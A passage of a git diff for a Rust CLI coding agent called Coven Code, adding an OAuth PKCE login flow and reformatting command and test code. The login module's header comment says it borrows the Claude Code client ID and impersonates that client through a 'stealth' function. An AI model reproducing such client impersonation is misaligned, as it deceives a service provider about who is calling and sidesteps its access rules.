Err(anyhow::anyhow!("Callback server dropped"))) - } - code = paste_rx => { - code.map_err(|_| anyhow::anyhow!("Stdin closed unexpectedly")) - } - _ = tokio::time::sleep(Duration::from_secs(120)) => { - bail!("Authentication timed out after 120 seconds") - } - } -} +// OAuth 2.0 PKCE login flow for the Coven Code CLI. +// +// Uses the Claude Code client ID and impersonates Claude Code at request time +// (see `claurst_core::oauth_config` for the impersonation constants and +// `claurst_api::AnthropicClient::apply_oauth_stealth` for how they're applied). +// Claude Pro/Max tokens used through Coven Code draw from the account's "extra +// usage" pool, not subscription quota — users should be aware of this before +// switching from API-key auth. +// +// Implements the same flow as the TypeScript OAuthService + authLogin(): +// 1. Generate PKCE code_verifier / code_challenge / state +// 2. Start a temporary localhost HTTP server on a random port +// 3. Build auth URL; print for the user and attempt to open in browser +// 4. Wait (with 60-second timeout) for: +// a. Automatic redirect to localhost/callback, OR +// b. User manually pastes the authorization code at the terminal +// 5. Exchange the authorization code for tokens via POST to TOKEN_URL +// 6. For Console flow: call create_api_key endpoint to get an API key +// 7. Save OAuthTokens to ~/.coven-code/oauth_tokens.json +// 8. Return the credential (API key or Bearer token) + +use anyhow::{bail, Context}; +use claurst_core::oauth::{self, OAuthTokens}; +use serde::Deserialize; +use std::time::Duration; +use tokio::io::{AsyncBufReadExt, AsyncWriteExt, BufReader}; +use tokio::net::TcpListener; +use tracing::{debug, info, warn}; +#[allow(unused_imports)] +use url::Url; + +// ---- Token exchange response ------------------------------------------------ + +#[derive(Debug, Deserialize)] +struct TokenExchangeResponse { + access_token: String, + #[serde(default)] + refresh_token: Option, + expires_in: u64, + #[serde(default)] + scope: Option, + #[serde(default)] + account: Option, + #[serde(default)] + organization: Option, +} + +// ---- API key creation response ---------------------------------------------- + +#[derive(Debug, Deserialize)] +struct CreateApiKeyResponse { + raw_key: Option, +} + +// ---- Public entry point ----------------------------------------------------- + +/// Outcome of a completed login flow. +#[derive(Debug, Clone)] +pub struct LoginResult { + /// The credential to use: either an API key (Console flow) or Bearer token (Claude.ai). + #[allow(dead_code)] + pub credential: String, + /// When true, present as `Authorization: Bearer `. + pub use_bearer_auth: bool, + /// Cached tokens saved to disk. + pub tokens: OAuthTokens, +} + +/// Run the interactive OAuth PKCE login flow. +/// +/// `login_with_claude_ai` selects the authorization endpoint: +/// - `false` → Console endpoint (creates an API key) +/// - `true` → Claude.ai endpoint (user:inference scope, Bearer auth) +pub async fn run_oauth_login_flow(login_with_claude_ai: bool) -> anyhow::Result { + run_oauth_login_flow_with_label(login_with_claude_ai, None).await +} + +/// Same as [`run_oauth_login_flow`] but lets the caller supply a human-friendly +/// label for the new profile (e.g. "work"). When `label` is `None` the profile +/// id is derived from the JWT email or account_uuid. +pub async fn run_oauth_login_flow_with_label( + login_with_claude_ai: bool, + label: Option<&str>, +) -> anyhow::Result { + // 1. PKCE + let code_verifier = oauth::generate_code_verifier(); + let code_challenge = oauth::generate_code_challenge(&code_verifier); + let state = oauth::generate_state(); + + // 2. Bind random localhost port for the callback server + let listener = TcpListener::bind("127.0.0.1:0") + .await + .context("Failed to bind OAuth callback server")?; + let port = listener.local_addr()?.port(); + + // 3. Build auth URLs + let authorize_base = if login_with_claude_ai { + oauth::CLAUDE_AI_AUTHORIZE_URL + } else { + oauth::CONSOLE_AUTHORIZE_URL + }; + let manual_url = oauth::build_auth_url(authorize_base, &code_challenge, &state, port, true); + let automatic_url = oauth::build_auth_url(authorize_base, &code_challenge, &state, port, false); + + // 4. Print URL and try to open browser + println!("\nOpening browser for authentication..."); + println!("If the browser did not open, visit:\n\n {}\n", manual_url); + try_open_browser(&automatic_url); + + // 5. Wait for auth code (automatic callback OR manual paste) + let auth_code = wait_for_auth_code_impl(listener, &state) + .await + .context("OAuth callback failed")?; + debug!("OAuth auth code received"); + + // 6. Exchange code for tokens + let token_resp = exchange_code_for_tokens(&auth_code, &state, &code_verifier, port, false) + .await + .context("Token exchange failed")?; + + let expires_at_ms = + chrono::Utc::now().timestamp_millis() + (token_resp.expires_in as i64 * 1000); + + let scopes: Vec = token_resp + .scope + .as_deref() + .unwrap_or("") + .split_whitespace() + .map(String::from) + .collect(); + + let account_uuid = token_resp + .account + .as_ref() + .and_then(|a| a.get("uuid").and_then(|v| v.as_str()).map(String::from)); + let email = token_resp.account.as_ref().and_then(|a| { + a.get("email_address") + .and_then(|v| v.as_str()) + .map(String::from) + }); + let organization_uuid = token_resp + .organization + .as_ref() + .and_then(|o| o.get("uuid").and_then(|v| v.as_str()).map(String::from)); + + let uses_bearer = scopes.iter().any(|s| s == oauth::CLAUDE_AI_INFERENCE_SCOPE); + + // 7. For Console flow, exchange the access token for an API key + let api_key = if !uses_bearer { + match create_api_key(&token_resp.access_token).await { + Ok(key) => { + info!("OAuth API key created successfully"); + Some(key) + } + Err(e) => { + warn!("Failed to create API key from OAuth token: {}", e); + None + } + } + } else { + None + }; + + // 8. Build and persist tokens + let tokens = OAuthTokens { + access_token: token_resp.access_token.clone(), + refresh_token: token_resp.refresh_token.clone(), + expires_at_ms: Some(expires_at_ms), + scopes: scopes.clone(), + account_uuid, + email, + organization_uuid, + subscription_type: None, + api_key: api_key.clone(), + }; + tokens + .save_and_register(label) + .await + .context("Failed to save OAuth tokens")?; + + let (credential, use_bearer_auth) = if uses_bearer { + (token_resp.access_token.clone(), true) + } else if let Some(key) = api_key { + (key, false) + } else { + bail!("Login succeeded but could not obtain a usable credential") + }; + + Ok(LoginResult { + credential, + use_bearer_auth, + tokens, + }) +} + +// ---- Helpers ---------------------------------------------------------------- + +/// Attempt to open the URL in the system default browser (best-effort). +fn try_open_browser(url: &str) { + #[cfg(target_os = "windows")] + { + // Use PowerShell to safely open URLs containing special characters (& etc.) + let ps_cmd = format!("Start-Process '{}'", url.replace('\'', "''")); + let _ = std::process::Command::new("powershell") + .args(["-NoProfile", "-NonInteractive", "-Command", &ps_cmd]) + .stdin(std::process::Stdio::null()) + .stdout(std::process::Stdio::null()) + .stderr(std::process::Stdio::null()) + .spawn(); + } + #[cfg(target_os = "macos")] + { + let _ = std::process::Command::new("open") + .arg(url) + .stdin(std::process::Stdio::null()) + .stdout(std::process::Stdio::null()) + .stderr(std::process::Stdio::null()) + .spawn(); + } + #[cfg(not(any(target_os = "windows", target_os = "macos")))] + { + let _ = std::process::Command::new("xdg-open") + .arg(url) + .stdin(std::process::Stdio::null()) + .stdout(std::process::Stdio::null()) + .stderr(std::process::Stdio::null()) + .spawn(); + } +} + +/// Tiny async HTTP server that captures /callback?code=AUTH_CODE&state=STATE. +async fn run_callback_server( + listener: TcpListener, + expected_state: &str, +) -> anyhow::Result { + debug!( + "OAuth callback server listening on port {}", + listener.local_addr()?.port() + ); + + // Accept exactly one connection (the browser redirect) + let (mut socket, _) = tokio::time::timeout(Duration::from_secs(120), listener.accept()) + .await + .context("Timeout waiting for browser redirect")? + .context("Accept failed")?; + + // Read the HTTP request line-by-line until the blank line + let (reader, mut writer) = socket.split(); + let mut reader = BufReader::new(reader); + let mut request_line = String::new(); + reader.read_line(&mut request_line).await?; + + // Drain remaining headers + loop { + let mut header = String::new(); + reader.read_line(&mut header).await?; + if header.trim().is_empty() { + break; + } + } + + // Parse the request line: "GET /callback?code=XXX&state=YYY HTTP/1.1" + let path = request_line + .split_whitespace() + .nth(1) + .unwrap_or("") + .to_string(); + + let parsed_url = url::Url::parse(&format!("http://localhost{}", path)) + .context("Failed to parse callback URL")?; + + let code = parsed_url + .query_pairs() + .find(|(k, _)| k == "code") + .map(|(_, v)| v.to_string()); + + let received_state = parsed_url + .query_pairs() + .find(|(k, _)| k == "state") + .map(|(_, v)| v.to_string()); + + // Send success redirect to the browser before validating, so the browser shows a page + let location = oauth::CLAUDEAI_SUCCESS_URL; + + let response = format!( + "HTTP/1.1 302 Found\r\nLocation: {}\r\nContent-Length: 0\r\nConnection: close\r\n\r\n", + location + ); + writer.write_all(response.as_bytes()).await?; + + // Validate + if received_state.as_deref() != Some(expected_state) { + bail!("OAuth state mismatch — possible CSRF attack"); + } + let code = code.context("No authorization code in callback")?; + + Ok(code) +} + +/// Read a single line from stdin (for manual code paste). +async fn read_line_from_stdin() -> anyhow::Result { + print!(" Or paste authorization code here: "); + use std::io::Write; + std::io::stdout().flush().ok(); + + let mut line = String::new(); + let stdin = tokio::io::stdin(); + let mut reader = BufReader::new(stdin); + reader.read_line(&mut line).await?; + Ok(line) +} + +/// Exchange the authorization code for OAuth tokens. +async fn exchange_code_for_tokens( + code: &str, + state: &str, + code_verifier: &str, + port: u16, + use_manual_redirect: bool, +) -> anyhow::Result { + let redirect_uri = if use_manual_redirect { + oauth::MANUAL_REDIRECT_URL.to_string() + } else { + format!("http://localhost:{}/callback", port) + }; + + let body = serde_json::json!({ + "grant_type": "authorization_code", + "code": code, + "redirect_uri": redirect_uri, + "client_id": oauth::CLIENT_ID, + "code_verifier": code_verifier, + "state": state, + }); + + let client = reqwest::Client::builder() + .timeout(Duration::from_secs(30)) + .build()?; + + let resp = client + .post(oauth::TOKEN_URL) + .header("content-type", "application/json") + .json(&body) + .send() + .await + .context("Token exchange HTTP request failed")?; + + if !resp.status().is_success() { + let status = resp.status(); + let text = resp.text().await.unwrap_or_default(); + bail!("Token exchange failed ({}): {}", status, text); + } + + resp.json::() + .await + .context("Failed to parse token exchange response") +} + +/// Exchange an OAuth access token for an Anthropic API key (Console flow only). +async fn create_api_key(access_token: &str) -> anyhow::Result { + let client = reqwest::Client::builder() + .timeout(Duration::from_secs(30)) + .build()?; + + let resp = client + .post(oauth::API_KEY_URL) + .header("Authorization", format!("Bearer {}", access_token)) + .send() + .await + .context("API key creation request failed")?; + + if !resp.status().is_success() { + let status = resp.status(); + let text = resp.text().await.unwrap_or_default(); + bail!("API key creation failed ({}): {}", status, text); + } + + let data: CreateApiKeyResponse = resp + .json() + .await + .context("Failed to parse API key response")?; + data.raw_key.context("Server returned no API key") +} + +// ---- Refresh token flow ----------------------------------------------------- + +/// Attempt to refresh an expired access token using the stored refresh token. +/// Saves updated tokens on success. +#[allow(dead_code)] +pub async fn refresh_oauth_token(tokens: &OAuthTokens) -> anyhow::Result { + let refresh_token = tokens + .refresh_token + .as_deref() + .context("No refresh token available")?; + + let body = serde_json::json!({ + "grant_type": "refresh_token", + "refresh_token": refresh_token, + "client_id": oauth::CLIENT_ID, + "scope": oauth::ALL_SCOPES.join(" "), + }); + + let client = reqwest::Client::builder() + .timeout(Duration::from_secs(30)) + .build()?; + + let resp = client + .post(oauth::TOKEN_URL) + .header("content-type", "application/json") + .json(&body) + .send() + .await + .context("Token refresh HTTP request failed")?; + + if !resp.status().is_success() { + let status = resp.status(); + let text = resp.text().await.unwrap_or_default(); + bail!("Token refresh failed ({}): {}", status, text); + } + + let token_resp: TokenExchangeResponse = resp.json().await?; + let expires_at_ms = + chrono::Utc::now().timestamp_millis() + (token_resp.expires_in as i64 * 1000); + + let scopes: Vec = token_resp + .scope + .as_deref() + .unwrap_or("") + .split_whitespace() + .map(String::from) + .collect(); + + let mut updated = tokens.clone(); + updated.access_token = token_resp.access_token; + if let Some(new_rt) = token_resp.refresh_token { + updated.refresh_token = Some(new_rt); + } + updated.expires_at_ms = Some(expires_at_ms); + updated.scopes = scopes; + + updated.save().await?; + Ok(updated) +} + +/// Wait for the OAuth authorization code from either the browser redirect (automatic) +/// or manual paste by the user. Races the two with a 120-second timeout. +async fn wait_for_auth_code_impl( + listener: TcpListener, + expected_state: &str, +) -> anyhow::Result { + let expected_state_clone = expected_state.to_string(); + let (cb_tx, cb_rx) = tokio::sync::oneshot::channel::>(); + + tokio::spawn(async move { + let result = run_callback_server(listener, &expected_state_clone).await; + let _ = cb_tx.send(result); + }); + + let (paste_tx, paste_rx) = tokio::sync::oneshot::channel::(); + tokio::spawn(async move { + if let Ok(line) = read_line_from_stdin().await { + let trimmed = line.trim().to_string(); + if !trimmed.is_empty() { + let _ = paste_tx.send(trimmed); + } + } + }); + + tokio::select! { + result = cb_rx => { + result.unwrap_or_else(|_| Err(anyhow::anyhow!("Callback server dropped"))) + } + code = paste_rx => { + code.map_err(|_| anyhow::anyhow!("Stdin closed unexpectedly")) + } + _ = tokio::time::sleep(Duration::from_secs(120)) => { + bail!("Authentication timed out after 120 seconds") + } + } +} diff --git a/src-rust/crates/cli/src/upgrade.rs b/src-rust/crates/cli/src/upgrade.rs index b1346da..e55fd06 100644 --- a/src-rust/crates/cli/src/upgrade.rs +++ b/src-rust/crates/cli/src/upgrade.rs @@ -59,8 +59,8 @@ pub async fn run_upgrade(args: &[String]) -> Result<()> { } // -------- locate current exe -------- - let exe_path = std::env::current_exe() - .context("could not determine current executable path")?; + let exe_path = + std::env::current_exe().context("could not determine current executable path")?; let exe_path = std::fs::canonicalize(&exe_path).unwrap_or(exe_path); println!("Installed at: {}", exe_path.display()); @@ -246,7 +246,12 @@ fn extract_archive(archive: &Path, dest: &Path, is_zip: bool) -> Result<()> { } // tar -xf works on Windows 10+ via bsdtar. let status = std::process::Command::new("tar") - .args(["-xf", &archive.to_string_lossy(), "-C", &dest.to_string_lossy()]) + .args([ + "-xf", + &archive.to_string_lossy(), + "-C", + &dest.to_string_lossy(), + ]) .status() .context("failed to spawn tar")?; if !status.success() { @@ -255,7 +260,12 @@ fn extract_archive(archive: &Path, dest: &Path, is_zip: bool) -> Result<()> { Ok(()) } else { let status = std::process::Command::new("tar") - .args(["-xzf", &archive.to_string_lossy(), "-C", &dest.to_string_lossy()]) + .args([ + "-xzf", + &archive.to_string_lossy(), + "-C", + &dest.to_string_lossy(), + ]) .status() .context("failed to spawn tar")?; if !status.success() { @@ -301,8 +311,9 @@ fn swap_binary(current: &Path, new: &Path) -> Result<()> { let mut sidelined = current.to_path_buf(); sidelined.set_extension("exe.old"); let _ = std::fs::remove_file(&sidelined); - std::fs::rename(current, &sidelined) - .with_context(|| format!("failed to sideline current exe to {}", sidelined.display()))?; + std::fs::rename(current, &sidelined).with_context(|| { + format!("failed to sideline current exe to {}", sidelined.display()) + })?; if let Err(e) = std::fs::copy(new, current) { // Try to roll back the rename so the user isn't left without coven-code. let _ = std::fs::rename(&sidelined, current); diff --git a/src-rust/crates/cli/tests/acp_smoke.rs b/src-rust/crates/cli/tests/acp_smoke.rs index 502f1db..3a608c7 100644 --- a/src-rust/crates/cli/tests/acp_smoke.rs +++ b/src-rust/crates/cli/tests/acp_smoke.rs @@ -5,14 +5,14 @@ //! This guards the wire-format and capability surface that registry-listed //! ACP clients (Zed, Neovim, JetBrains, …) rely on. Runs against the //! debug binary produced by `cargo build` — Cargo provides the path via -//! `CARGO_BIN_EXE_claurst` (internal Cargo env for package "claurst"). +//! `CARGO_BIN_EXE_coven-code` (internal Cargo env for the binary target). use std::io::Write; use std::process::{Command, Stdio}; use std::time::Duration; fn binary_path() -> String { - env!("CARGO_BIN_EXE_claurst").to_string() + env!("CARGO_BIN_EXE_coven-code").to_string() } fn run_with_input(stdin: &str, timeout: Duration) -> (String, String) { @@ -26,7 +26,9 @@ fn run_with_input(stdin: &str, timeout: Duration) -> (String, String) { { let mut stdin_handle = child.stdin.take().expect("stdin"); - stdin_handle.write_all(stdin.as_bytes()).expect("write stdin"); + stdin_handle + .write_all(stdin.as_bytes()) + .expect("write stdin"); // Dropping stdin signals EOF — the agent will finish in-flight work // and then exit cleanly. } @@ -101,7 +103,10 @@ fn session_new_returns_session_id() { let session_id = resp["result"]["sessionId"] .as_str() .expect("sessionId should be a string"); - assert!(session_id.starts_with("acp-"), "sessionId not prefixed: {session_id}"); + assert!( + session_id.starts_with("acp-"), + "sessionId not prefixed: {session_id}" + ); } #[test] @@ -130,5 +135,8 @@ fn cancel_notification_is_silent() { .filter(|l| !l.trim().is_empty()) .filter(|l| serde_json::from_str::(l).is_ok()) .count(); - assert_eq!(response_count, 1, "unexpected extra responses in:\n{stdout}"); + assert_eq!( + response_count, 1, + "unexpected extra responses in:\n{stdout}" + ); } diff --git a/src-rust/crates/commands/src/lib.rs b/src-rust/crates/commands/src/lib.rs index 0e0d203..fa037b9 100644 --- a/src-rust/crates/commands/src/lib.rs +++ b/src-rust/crates/commands/src/lib.rs @@ -8,10 +8,11 @@ use async_trait::async_trait; use claurst_core::config::{Config, Settings, Theme}; use claurst_core::cost::CostTracker; use claurst_core::types::{ContentBlock, Message}; +use once_cell::sync::Lazy; use std::collections::BTreeMap; -use std::sync::Arc; #[allow(unused_imports)] use std::path::PathBuf; +use std::sync::Arc; // --------------------------------------------------------------------------- // Core trait @@ -157,10 +158,14 @@ fn resolve_fast_model_id(config: &Config) -> String { provider_lookup_ids(provider_id) .into_iter() .find_map(|lookup_id| registry.best_small_model_for_provider(lookup_id)) - .unwrap_or_else(|| stripped_model_for_provider(provider_id, config.effective_model()).to_string()) + .unwrap_or_else(|| { + stripped_model_for_provider(provider_id, config.effective_model()).to_string() + }) } -async fn provider_for_config(config: &Config) -> Option> { +async fn provider_for_config( + config: &Config, +) -> Option> { let anthropic_auth = config.resolve_anthropic_auth_async().await; let registry = claurst_api::ProviderRegistry::from_config( config, @@ -179,7 +184,11 @@ async fn provider_for_config(config: &Config) -> Option String { @@ -331,7 +340,7 @@ fn open_with_system(target: &str) -> std::io::Result<()> { .stdout(std::process::Stdio::null()) .stderr(std::process::Stdio::null()) .spawn()?; - return Ok(()); + Ok(()) } #[cfg(target_os = "macos")] @@ -342,7 +351,7 @@ fn open_with_system(target: &str) -> std::io::Result<()> { .stdout(std::process::Stdio::null()) .stderr(std::process::Stdio::null()) .spawn()?; - return Ok(()); + Ok(()) } #[cfg(not(any(target_os = "windows", target_os = "macos")))] @@ -408,10 +417,7 @@ fn generate_keybindings_template() -> anyhow::Result { .collect(), }; - Ok(format!( - "{}\n", - serde_json::to_string_pretty(&template)? - )) + Ok(format!("{}\n", serde_json::to_string_pretty(&template)?)) } fn parse_theme(name: &str) -> Option { @@ -493,31 +499,36 @@ fn command_category(name: &str) -> &'static str { "clear" | "compact" | "rewind" | "summary" | "export" | "rename" | "branch" | "fork" => { "Conversation" } - "model" | "config" | "theme" | "color" | "vim" | "fast" | "effort" - | "voice" | "statusline" | "output-style" | "keybindings" - | "privacy-settings" | "rate-limit-options" | "sandbox-toggle" => "Settings", + "model" | "config" | "theme" | "color" | "vim" | "fast" | "effort" | "voice" + | "statusline" | "output-style" | "keybindings" | "privacy-settings" + | "rate-limit-options" | "sandbox-toggle" => "Settings", "cost" | "stats" | "usage" | "extra-usage" | "context" | "ctx-viz" => "Usage & Cost", "status" | "doctor" | "terminal-setup" | "version" | "update" | "upgrade" | "release-notes" => "System", "login" | "logout" | "refresh" | "permissions" => "Auth & Permissions", - "memory" | "files" | "diff" | "init" | "commit" | "review" - | "security-review" | "import-config" => "Project", + "memory" | "files" | "diff" | "init" | "commit" | "review" | "security-review" + | "import-config" => "Project", "mcp" | "hooks" | "ide" | "chrome" => "Integrations", - "session" | "resume" | "remote-control" | "remote-env" - | "teleport" => "Sessions & Remote", + "session" | "resume" | "remote-control" | "remote-env" | "teleport" => "Sessions & Remote", "help" | "exit" | "feedback" | "bug" => "General", "think-back" | "thinkback-play" | "thinking" | "plan" | "tasks" => "AI & Thinking", - "copy" | "skills" | "agents" | "plugin" | "reload-plugins" - | "stickers" | "passes" | "desktop" | "mobile" | "btw" => "Tools & Extras", + "copy" | "skills" | "agents" | "plugin" | "reload-plugins" | "stickers" | "passes" + | "desktop" | "mobile" | "btw" => "Tools & Extras", _ => "Other", } } #[async_trait] impl SlashCommand for HelpCommand { - fn name(&self) -> &str { "help" } - fn aliases(&self) -> Vec<&str> { vec!["h", "?"] } - fn description(&self) -> &str { "Show available commands and usage information" } + fn name(&self) -> &str { + "help" + } + fn aliases(&self) -> Vec<&str> { + vec!["h", "?"] + } + fn description(&self) -> &str { + "Show available commands and usage information" + } async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult { if !args.is_empty() { @@ -529,7 +540,11 @@ impl SlashCommand for HelpCommand { } else { format!( "\nAliases: {}", - aliases.iter().map(|a| format!("/{}", a)).collect::>().join(", ") + aliases + .iter() + .map(|a| format!("/{}", a)) + .collect::>() + .join(", ") ) }; return CommandResult::Message(format!( @@ -574,13 +589,18 @@ impl SlashCommand for HelpCommand { } else { format!( " ({})", - aliases.iter().map(|a| format!("/{}", a)).collect::>().join(", ") + aliases + .iter() + .map(|a| format!("/{}", a)) + .collect::>() + .join(", ") ) }; - by_cat - .entry(cat) - .or_default() - .push(format!(" /{:<20} {}", format!("{}{}", cmd.name(), alias_str), cmd.description())); + by_cat.entry(cat).or_default().push(format!( + " /{:<20} {}", + format!("{}{}", cmd.name(), alias_str), + cmd.description() + )); } let mut output = String::from("Coven Code — Slash Commands\n"); @@ -604,9 +624,15 @@ impl SlashCommand for HelpCommand { #[async_trait] impl SlashCommand for ClearCommand { - fn name(&self) -> &str { "clear" } - fn aliases(&self) -> Vec<&str> { vec!["c", "reset", "new"] } - fn description(&self) -> &str { "Clear the conversation history" } + fn name(&self) -> &str { + "clear" + } + fn aliases(&self) -> Vec<&str> { + vec!["c", "reset", "new"] + } + fn description(&self) -> &str { + "Clear the conversation history" + } async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult { CommandResult::ClearConversation @@ -617,8 +643,12 @@ impl SlashCommand for ClearCommand { #[async_trait] impl SlashCommand for CompactCommand { - fn name(&self) -> &str { "compact" } - fn description(&self) -> &str { "Compact the conversation to reduce token usage" } + fn name(&self) -> &str { + "compact" + } + fn description(&self) -> &str { + "Compact the conversation to reduce token usage" + } async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult { let msg_count = ctx.messages.len(); @@ -642,8 +672,12 @@ impl SlashCommand for CompactCommand { #[async_trait] impl SlashCommand for CostCommand { - fn name(&self) -> &str { "cost" } - fn description(&self) -> &str { "Show token usage and cost for this session" } + fn name(&self) -> &str { + "cost" + } + fn description(&self) -> &str { + "Show token usage and cost for this session" + } fn help(&self) -> &str { "Usage: /cost\n\n\ Shows per-category token counts and the estimated cost for this session.\n\ @@ -665,10 +699,10 @@ impl SlashCommand for CostCommand { let cost = tracker.total_cost_usd(); // Per-category cost breakdown. - let input_cost = (input as f64 * pricing.input_per_mtk) / 1_000_000.0; - let output_cost = (output as f64 * pricing.output_per_mtk) / 1_000_000.0; - let cc_cost = (cache_create as f64 * pricing.cache_creation_per_mtk) / 1_000_000.0; - let cr_cost = (cache_read as f64 * pricing.cache_read_per_mtk) / 1_000_000.0; + let input_cost = (input as f64 * pricing.input_per_mtk) / 1_000_000.0; + let output_cost = (output as f64 * pricing.output_per_mtk) / 1_000_000.0; + let cc_cost = (cache_create as f64 * pricing.cache_creation_per_mtk) / 1_000_000.0; + let cr_cost = (cache_read as f64 * pricing.cache_read_per_mtk) / 1_000_000.0; // Pricing info line. let pricing_line = format!( @@ -682,10 +716,12 @@ impl SlashCommand for CostCommand { // Cache savings note: how much input cost was avoided by using cache-read // instead of re-sending those tokens as normal input. let savings = if cache_read > 0 { - let saved = - (cache_read as f64 * (pricing.input_per_mtk - pricing.cache_read_per_mtk)) - / 1_000_000.0; - format!("\n Cache savings: ${:.4} ({} tokens served from cache)", saved, cache_read) + let saved = (cache_read as f64 * (pricing.input_per_mtk - pricing.cache_read_per_mtk)) + / 1_000_000.0; + format!( + "\n Cache savings: ${:.4} ({} tokens served from cache)", + saved, cache_read + ) } else { String::new() }; @@ -723,9 +759,15 @@ impl SlashCommand for CostCommand { #[async_trait] impl SlashCommand for ExitCommand { - fn name(&self) -> &str { "exit" } - fn aliases(&self) -> Vec<&str> { vec!["quit", "q"] } - fn description(&self) -> &str { "Exit Coven Code" } + fn name(&self) -> &str { + "exit" + } + fn aliases(&self) -> Vec<&str> { + vec!["quit", "q"] + } + fn description(&self) -> &str { + "Exit Coven Code" + } async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult { CommandResult::Exit @@ -736,8 +778,12 @@ impl SlashCommand for ExitCommand { #[async_trait] impl SlashCommand for ModelCommand { - fn name(&self) -> &str { "model" } - fn description(&self) -> &str { "Show or change the current model" } + fn name(&self) -> &str { + "model" + } + fn description(&self) -> &str { + "Show or change the current model" + } fn help(&self) -> &str { "Usage: /model []\n\n\ Without arguments, shows the current model.\n\n\ @@ -754,10 +800,7 @@ impl SlashCommand for ModelCommand { async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult { let args = args.trim(); if args.is_empty() { - CommandResult::Message(format!( - "Current model: {}", - ctx.config.effective_model() - )) + CommandResult::Message(format!("Current model: {}", ctx.config.effective_model())) } else { // Accept both "provider/model" and bare model names. // The config stores the full string (including provider prefix when present) @@ -786,9 +829,15 @@ impl SlashCommand for ModelCommand { #[async_trait] impl SlashCommand for ConfigCommand { - fn name(&self) -> &str { "config" } - fn aliases(&self) -> Vec<&str> { vec!["settings"] } - fn description(&self) -> &str { "Show or modify configuration settings" } + fn name(&self) -> &str { + "config" + } + fn aliases(&self) -> Vec<&str> { + vec!["settings"] + } + fn description(&self) -> &str { + "Show or modify configuration settings" + } async fn execute(&self, args: &str, ctx: &mut CommandContext) -> CommandResult { let args = args.trim(); @@ -807,10 +856,9 @@ impl SlashCommand for ConfigCommand { "output-style = {}", current_output_style_name(&ctx.config) )), - "model" => CommandResult::Message(format!( - "model = {}", - ctx.config.effective_model() - )), + "model" => { + CommandResult::Message(format!("model = {}", ctx.config.effective_model())) + } "permission-mode" | "permission_mode" => CommandResult::Message(format!( "permission-mode = {:?}", ctx.config.permission_mode @@ -824,7 +872,8 @@ impl SlashCommand for ConfigCommand { "model" => { let mut new_config = ctx.config.clone(); new_config.model = None; - if let Err(err) = save_settings_mutation(|settings| settings.config.model = None) + if let Err(err) = + save_settings_mutation(|settings| settings.config.model = None) { return CommandResult::Error(format!( "Failed to save configuration: {}", @@ -895,8 +944,7 @@ impl SlashCommand for ConfigCommand { } let mut new_config = ctx.config.clone(); - new_config.output_style = - (normalized != "default").then(|| normalized.clone()); + new_config.output_style = (normalized != "default").then(|| normalized.clone()); if let Err(err) = save_settings_mutation(|settings| { settings.config.output_style = (normalized != "default").then(|| normalized.clone()); @@ -929,10 +977,7 @@ impl SlashCommand for ConfigCommand { }) { return CommandResult::Error(format!("Failed to save configuration: {}", err)); } - CommandResult::ConfigChangeMessage( - new_config, - format!("Model set to {}.", value), - ) + CommandResult::ConfigChangeMessage(new_config, format!("Model set to {}.", value)) } "permission-mode" | "permission_mode" => { let mode = match value.trim().to_lowercase().as_str() { @@ -973,8 +1018,12 @@ impl SlashCommand for ConfigCommand { #[async_trait] impl SlashCommand for ColorCommand { - fn name(&self) -> &str { "color" } - fn description(&self) -> &str { "Set or show the prompt bar color for this session" } + fn name(&self) -> &str { + "color" + } + fn description(&self) -> &str { + "Set or show the prompt bar color for this session" + } fn help(&self) -> &str { "Usage: /color []\n\n\ Sets the accent color for the prompt bar in this session.\n\ @@ -1001,10 +1050,11 @@ impl SlashCommand for ColorCommand { None } else { let known_colors = [ - "red", "green", "blue", "yellow", "cyan", "magenta", - "white", "orange", "purple", "pink", "gray", "grey", + "red", "green", "blue", "yellow", "cyan", "magenta", "white", "orange", "purple", + "pink", "gray", "grey", ]; - let is_hex = color.starts_with('#') && (color.len() == 4 || color.len() == 7) + let is_hex = color.starts_with('#') + && (color.len() == 4 || color.len() == 7) && color[1..].chars().all(|c| c.is_ascii_hexdigit()); if !is_hex && !known_colors.contains(&color.to_lowercase().as_str()) { return CommandResult::Error(format!( @@ -1030,8 +1080,12 @@ impl SlashCommand for ColorCommand { #[async_trait] impl SlashCommand for ThemeCommand { - fn name(&self) -> &str { "theme" } - fn description(&self) -> &str { "Show or change the current theme" } + fn name(&self) -> &str { + "theme" + } + fn description(&self) -> &str { + "Show or change the current theme" + } fn help(&self) -> &str { "Usage: /theme [default|dark|light]\n\ Without arguments, shows the active theme. With an argument, updates the theme for this and future sessions." @@ -1047,15 +1101,12 @@ impl SlashCommand for ThemeCommand { } let Some(theme) = parse_theme(args) else { - return CommandResult::Error( - "Theme must be one of: default, dark, light".to_string(), - ); + return CommandResult::Error("Theme must be one of: default, dark, light".to_string()); }; let mut new_config = ctx.config.clone(); new_config.theme = theme.clone(); - if let Err(err) = save_settings_mutation(|settings| settings.config.theme = theme.clone()) - { + if let Err(err) = save_settings_mutation(|settings| settings.config.theme = theme.clone()) { return CommandResult::Error(format!("Failed to save theme: {}", err)); } @@ -1070,8 +1121,12 @@ impl SlashCommand for ThemeCommand { #[async_trait] impl SlashCommand for OutputStyleCommand { - fn name(&self) -> &str { "output-style" } - fn description(&self) -> &str { "Show or switch the current output style" } + fn name(&self) -> &str { + "output-style" + } + fn description(&self) -> &str { + "Show or switch the current output style" + } fn help(&self) -> &str { "Usage: /output-style [style-name]\n\n\ With no argument: list available styles and show the current one.\n\ @@ -1109,8 +1164,7 @@ impl SlashCommand for OutputStyleCommand { let mut new_config = ctx.config.clone(); new_config.output_style = (normalized != "default").then(|| normalized.clone()); if let Err(err) = save_settings_mutation(|settings| { - settings.config.output_style = - (normalized != "default").then(|| normalized.clone()); + settings.config.output_style = (normalized != "default").then(|| normalized.clone()); }) { return CommandResult::Error(format!("Failed to save configuration: {}", err)); } @@ -1129,8 +1183,12 @@ impl SlashCommand for OutputStyleCommand { #[async_trait] impl SlashCommand for KeybindingsCommand { - fn name(&self) -> &str { "keybindings" } - fn description(&self) -> &str { "Create or open ~/.coven-code/keybindings.json" } + fn name(&self) -> &str { + "keybindings" + } + fn description(&self) -> &str { + "Create or open ~/.coven-code/keybindings.json" + } async fn execute(&self, _args: &str, _ctx: &mut CommandContext) -> CommandResult { let config_dir = Settings::config_dir(); @@ -1195,8 +1253,12 @@ impl SlashCommand for KeybindingsCommand { #[async_trait] impl SlashCommand for 